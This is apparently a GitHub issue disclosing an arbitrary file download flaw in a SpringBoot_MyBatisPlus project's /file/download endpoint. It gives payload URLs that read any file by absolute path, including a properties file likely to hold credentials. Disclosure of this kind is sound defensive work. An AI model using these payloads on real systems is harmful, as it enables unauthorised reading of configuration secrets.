There is a vulnerability in arbitrary file download in the system


Vulnerability exploitation points:
Com. Wstro. Controller. SysFileController# loopholes in the download points
bos = new BufferedOutputStream(response.getOutputStream());
bis = new BufferedInputStream(new FileInputStream(file));
The path does not belong to "/admin/**", and any user can access /file/**

![Image](https://github.com/user-attachments/assets/7cca35ae-b74f-4110-a924-4623aa2f15f1)

![Image](https://github.com/user-attachments/assets/eb57f25b-8643-4c34-b071-a95ccff58607)
"/file/download" receives two values, "name" and "real". When "real" equals true, the file can be read directly through the absolute path or the relative path.

![Image](https://github.com/user-attachments/assets/c1f3b738-204f-4067-882c-a8da084771cb)

payload:
http://localhost/file/download?name=+"The path of the file to be read“
http://localhost/file/download?name=E:/xxx/SpringBoot_MyBatisPlus-master/SpringBoot_MyBatisPlus-master/src/main/resources/application-dev.properties&real=true

![Image](https://github.com/user-attachments/assets/033e9c07-7369-4f1a-a458-caf0a7273e13)

![Image](https://github.com/user-attachments/assets/77185f80-e3fb-43e7-a982-30c433584b55)

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Uh oh!

There is a vulnerability in arbitrary file download in the system #18

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Uh oh!

There is a vulnerability in arbitrary file download in the system #18

Description

Metadata

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Issue actions